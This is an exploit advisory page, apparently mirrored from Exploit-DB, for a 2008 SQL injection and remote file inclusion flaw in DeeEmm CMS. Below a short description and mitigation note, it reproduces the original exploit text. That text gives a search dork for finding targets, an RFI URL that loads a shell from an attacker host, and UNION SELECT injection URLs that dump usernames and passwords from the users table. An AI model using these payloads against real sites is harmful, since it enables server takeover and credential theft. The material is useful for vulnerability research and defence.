DeeEmm CMS Sql Injection/Rfi

vendor:

DeeEmm CMS

by:

IRCRASH (R3d.W0rm (Sina Yazdanmehr))

8.8

CVSS

HIGH

SQL Injection/RFI

CWE

Product Name: DeeEmm CMS

Affected Version From: 2000.7.4

Affected Version To: 2000.7.4

Patch Exists: NO

Related CWE: N/A

CPE: a:deeemm:deeemm_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

DeeEmm CMS Sql Injection/Rfi

A vulnerability exists in DeeEmm CMS which allows an attacker to inject malicious SQL queries and execute arbitrary remote files. This vulnerability is due to insufficient sanitization of user-supplied input in the 'INDM' and 'language_dir' parameters of the 'user_language.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in arbitrary code execution, SQL injection, and other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to execute unintended commands. Additionally, the application should be configured to use the least privilege necessary to perform its function.

Source

Exploit-DB raw data:

#####################################################################################
####                        DeeEmm CMS Sql Injection/Rfi                         ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : http://surfnet.dl.sourceforge.net/sourceforge/dmcms/dmcms_074.tar.gz
#                                                                                   #
#Home Page : www.deeemm.com                                                         #
#                                                                                   #
#DORK : "DeeEmm CMS"                                                                #
#                                                                                   #
#####################################################################################
#                                      [Rfi]                                        #
#                                                                                   #
#http://Site/user_language.php?INDM=r3d.w0rm&language_dir=http://evil-site.com/shell.txt?
#                                                                                   #
#                                 [Sql Injection]                                   #
#                                                                                   #
#http://Site/index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users/*                                #
#http://Site/index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users                                #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-08-15]